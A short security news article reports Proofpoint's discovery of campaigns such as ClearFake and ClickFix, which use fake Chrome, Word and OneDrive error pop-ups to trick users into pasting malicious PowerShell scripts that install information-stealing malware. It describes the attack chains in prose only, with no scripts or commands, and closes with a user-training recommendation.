Researchers discover fake Chrome errors, tricking users into running malicious PowerShell scripts
Security researchers working for cybersecurity firm Proofpoint, have identified a new social engineering technique to trick Google Chrome users to run PowerShell scripts and install malware.
The researchers first noticed this technique with the ClearFake campaign that ran last April. However, instead of faking a browser update, scammers try to scam people by using fake Google Chrome, Microsoft Word and Microsoft OneDrive errors.
The scam works as follows. Users get to see a popup textbox on their screen, suggesting an error occurred when they tried to open a document or webpage. Next, they receive instructions to copy and paste a (malicious) script into the Windows PowerShell Terminal.
Instead of resolving the problem, the threat actor uses this method to deliver malware like DarkGate, Matanbuchus, NetSupport, Lumma Stealer and similar information stealer software. By running one initial PowerShell script, five distinct malware families could be executed.
Proofpoint researchers discovered three of these attack chains. After the ClearFake campaign, researchers found the ClickFix campaign, which used an injection on websites that had been compromised to create an iframe to display another fake Google Chrome error.
Finally, the scammers launched an email-based infection chain that targeted thousands of organizations worldwide by using an HTML attachment resembling a Microsoft Word document asking users to install the ‘World Online’ extension to view the document correctly. At the end of May, researchers noticed that the same scam was being used to fake an error message on Microsoft’s backup solution OneDrive.
One of the threat actors using this technique is TA571, a well-known spam distributor that sends large volumes of emails with malware.
Proofpoint recommends organizations to train employees to identify and report suspicious activities to their security teams. “This is very specific training but can easily be integrated into an existing user training program,” the cybersecurity firm concludes.
Your email address will not be published. Required fields are marked